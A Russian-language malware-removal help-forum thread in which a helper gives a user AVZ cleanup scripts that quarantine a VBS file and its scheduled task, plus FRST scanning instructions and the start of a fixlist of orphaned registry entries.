Перейти к содержанию
Правила раздела

вирус powershell

Alexoon

Автор Alexoon
в Помощь в удалении вирусов

 Поделиться

Рекомендуемые сообщения

Alexoon

Alexoon

Опубликовано
Опубликовано

Подхватил какой-то вирус с почты. Постоянно открывается powershell и браузеры, т.е. по 5 раз в секунду

 

Антивирусы ни один его не видят

CollectionLog-2025.08.22-16.02.zip

thyrex

thyrex

Опубликовано
Опубликовано

Здравствуйте.

 

Запустите AVZ из папки Autologger от имени Администратора по правой кнопке мыши.

 

Выполните скрипт в AVZ (ФайлВыполнить скрипт – вставить текст скрипта из окна Код)

begin
if not IsWOW64
 then
  begin
   SearchRootkit(true, true);
   SetAVZGuardStatus(True);
  end;
 QuarantineFile('C:\Users\HP\AppData\Roaming\zSGsLLwUDrzNMOP.VBS','');
 DeleteFile('C:\Users\HP\AppData\Roaming\zSGsLLwUDrzNMOP.VBS','64');
 DeleteSchedulerTask('zSGsLLwUDrzNMOP');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
RebootWindows(false);
end.

  • Обратите внимание: будет выполнена перезагрузка компьютера.

 

Выполните скрипт в AVZ

begin
DeleteFile(GetAVZDirectory+'quarantine.7z');
ExecuteFile(GetAVZDirectory+'7za.exe', 'a -mx9 -pmalware quarantine ./Quarantine/', 1, 0, true);
end.

Отправьте quarantine.7z из папки с распакованной утилитой AVZ с помощью формы отправки карантина или на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: malware в теле письма.

 

Пожалуйста, ЕЩЕ РАЗ запустите Autologger; прикрепите к следующему сообщению НОВЫЕ логи.
 

thyrex

thyrex

Опубликовано
Опубликовано

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

  • Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.


1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
2. Убедитесь, что в окне Optional Scan (Дополнительные опции) отмечены List BCD и 90 Days Files.
3. Нажмите кнопку Scan (Сканировать).
4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа.
5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt).
6. Файлы FRST.txt и Addition.txt заархивируйте (в один общий архив) и прикрепите к сообщению.

thyrex

thyrex

Опубликовано
Опубликовано

1. Выделите следующий код и скопируйте в буфер обмена (правая кнопка мышиКопировать) 

Start::
CreateRestorePoint:
HKU\S-1-5-21-568811627-1030119235-1092430148-1001\...\Run: [Windscribe] => "C:\Program Files (x86)\Windscribe\Windscribe.exe" -os_restart (Нет файла)
HKLM\...\Run: [BtServer] => "C:\Program Files (x86)\REALTEK\Realtek Bluetooth\BTServer.exe" (Нет файла)
HKU\S-1-5-21-568811627-1030119235-1092430148-1001\...\Run: [YandexBrowserAutoLaunch_5BA204CFF6B18BFAA85ACC7692A83DFA] => "C:\Users\HP\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --shutdown-if-not-closed-by-system-restart --zombie-wakeup (Нет файла)
Task: {48FD144C-51F1-4159-B28B-6B3743DD162C} - System32\Tasks\Opera scheduled Autoupdate 1696510333 => C:\Users\HP\AppData\Local\Programs\Opera\launcher.exe  --scheduledautoupdate $(Arg0) (Нет файла)
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{0190049B-9B00-4915-87D6-C1F22B030534}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{034527FE-C92E-4F69-95E1-72C9833418DC}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{037FFECA-57D8-4844-803D-667C8C863011}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{0649087D-CA0A-4C32-8CE9-685311E7B657}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{06F2A3C6-E958-4127-9B03-1FD8BD60EB99}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{073D60C5-B500-49E3-A26B-EEBB19EBA575}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{0A93FC43-0478-4B60-9D0B-3212D3BB32A8}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{0C29460C-112A-484E-B378-89B743387C12}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{0C7CA15B-0EB4-43D1-B3AE-2CCD518F331A}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{0CAACE29-FDD8-4356-8585-A88C0DE63CB0}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{0D4BACA0-DE8A-4C1E-B4CA-A20197BD0D42}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{0DD7AC4D-FDAD-4CFB-B114-57740D02A191}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{0E595D45-9DE5-437F-97B5-28A8B670282D}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{112629B3-48E2-4665-A809-8A4A153CB779}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{126BED90-DB6A-40B7-B4B8-EBA3AB41132B}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{12AD6CE8-D718-4C39-9C6F-6A0E4F6E029C}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{1518E564-BD84-4F79-B8DB-2F2F79603E2B}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{159416D5-2C2B-40C9-ACFD-8BEEF29E776A}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{166E81B8-B384-4777-923D-F7BF873A9AC8}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{16C9BCF5-E1F9-407C-96E5-40A419F8AC96}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{16F627A9-0D57-46F1-BAEF-8F1EBF794198}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{1717A8EB-F893-4ED3-9751-DAAD61AEAFA5}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{18819776-8736-44A3-B37B-168959376433}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{1AF0C52D-CB1D-4729-AC5C-8C95E84FA41F}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{1E01F27D-E095-4EE7-A6DA-37CD80232E8B}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{1E3CA3F0-497C-4787-A056-BB3A6DCD89CC}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{1EE1B1FC-FE51-47BA-8357-0C4498027B5F}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{25C1630D-234B-4039-90AB-3D17C59A1DF0}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{2629AA0C-96E2-4E05-866A-D7294BE323EE}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{2AC02B84-A734-48FB-BF04-7B3BE316A8BF}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{2B973DB7-C683-4D87-90E8-B920D13024A8}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{2C0AD807-33C5-4FCD-9D70-D24B6831D837}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{2E4DD395-4C06-4777-8128-2852951A457F}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{2F77F9C3-60D6-4E78-BE0A-42712F79FAE3}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{30894977-B479-4B8C-86F4-CAA88F9BEAB0}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{313B28C0-335A-4F47-B035-65119869CA4B}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{31F60EFD-0F00-49E9-9274-70131061C4B0}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{33BADC85-C3E9-4FF2-8B18-7732C6E41665}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{361BDC4F-A699-46D1-8D87-4FFAC32A79BD}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{37DDBF56-E00B-4139-A86A-4EB041E4B3C6}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{380D6F8A-A078-437B-AC1C-3F428AF55FEB}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{38797969-C77D-40EB-8BAC-FCB2D137A82F}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{3A5627D6-4CFE-4753-98F0-B5855AEFB81A}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{3AA5D5B9-63C0-4163-8813-0750A4F74539}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{3B47FA2F-AFFF-4AAF-805D-16F59B2E78F3}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{3C445E11-311D-44F5-927D-1CAA00C9DC8E}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{3DAE8208-ABAD-4EA4-8847-B1095645D438}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{3E10B9D1-DFC1-40D0-B26B-D14401046424}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{3EB72633-D226-4898-935C-445626BD899B}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{48D113BC-A1C7-43AA-B04B-FCBBFA5B6F34}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{4A4B2487-FA74-4C3C-8D20-4CB8AFE5A471}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{4A4F70F7-8867-43B3-A259-E31EFA28A5FC}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{4FC3FE12-A65E-4A72-B9D7-79BFC95BBE43}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{51BBE307-960B-4AFE-A431-0D08F2869883}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{523B208B-ABBD-4B27-B0AB-CCC8EF602774}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{524A91DD-8FAF-4EB2-8DBF-B6DC32ED7711}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{589E25C1-C340-4E7A-9B83-CBC1149EF7A0}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{5A82FC94-0BD5-4D57-846B-CAE938827959}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{5E1CBD80-8DDC-4A69-9DD9-574CF3ABD2A3}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{5EA0D477-3C1A-4AFA-A526-2272664A5134}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{5EABB2C7-B5FC-496F-95C8-97C2BE8F5FFA}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{5FF9441E-4B54-4010-908A-5670CD20295C}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{60903D93-C4DF-486C-98F3-1407BA9014BE}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{61C63A29-FAFE-4149-8EFD-27CE4A0D2346}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{6235C566-AE3B-45DC-9E3E-7452500E9238}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{62D37553-AE37-4FD3-8F2B-E549CF4C91B0}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{63185309-F4D6-447E-AC59-C9200349A5FE}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{6479C761-B346-47D0-BAB5-AA5A80AAD126}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{64F55A42-DDBD-47A7-93F6-4FDEAF9069CC}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{6C2B1999-C6E6-4BFD-9455-4DB38CBE0334}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{6F814E8B-7129-4752-8EA9-2816454F518C}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{6FA48ABD-E1D5-416C-B930-3E7EFE19084A}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{717501E0-CD0B-4558-BB59-AB9B5F194FB3}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{7351DA17-47AA-4116-9950-705F4DB1AD29}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{739196D9-8897-43ED-97AB-4FF3049AA83B}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{74F1554C-C7E0-4769-B1C7-165A1E6CE923}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{756A6A6A-9036-4ECA-BD28-AE05BD865054}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{77343609-D725-4BFF-AF42-3EEF0B94A472}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{77357125-5950-4C6F-9ED9-43BE9F6D5755}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{78C5DBB4-1D70-4798-B8C5-0E60D27D58DA}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{7A5DBAC0-A205-43C4-B08C-F58DF86C0021}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{7AB501F0-0DA5-465E-ADAB-60BC2F1BC02B}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{7D2F1079-893D-4D0E-B0C9-8CE84264BD0C}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{7D677393-4E68-460B-9ED2-DF0F698D3617}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{7F6B5A8F-93F2-4B62-9F60-701E6978FAE5}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{7F7F97FE-6002-4087-B606-7CB089743770}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{80221558-6013-47A5-BB0A-17FDDEF8A4FF}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{8319C9BC-708F-4DC9-A66F-47BF59A9DDDE}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{85C6FA7B-551D-4AFA-ABAC-AF21DE0CD8A7}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{864C8929-FB26-41CD-9087-8A9028DA9BC5}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{874AF15D-1DD9-4A39-8453-F0F48D08D541}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{8A40EB6D-7F63-4F19-86E9-FD63CEF6F16F}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{8A7C4875-E93D-4904-B20A-E178600206AC}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{8B9E42CE-995D-4ED6-B690-C784424E6C25}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{8FFB8BBE-4F73-48E7-B9AD-62AE27688A42}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
CustomCLSID: HKU\S-1-5-21-568811627-1030119235-1092430148-1001_Classes\CLSID\{90277268-4EEF-40CF-BBCC-32F758F4FD5F}\InprocServer32 -> C:\Users\HP\AppData\Local\Temp\AddInDiadocAPI_5_28_5_501_x86_64.dll => Нет файла
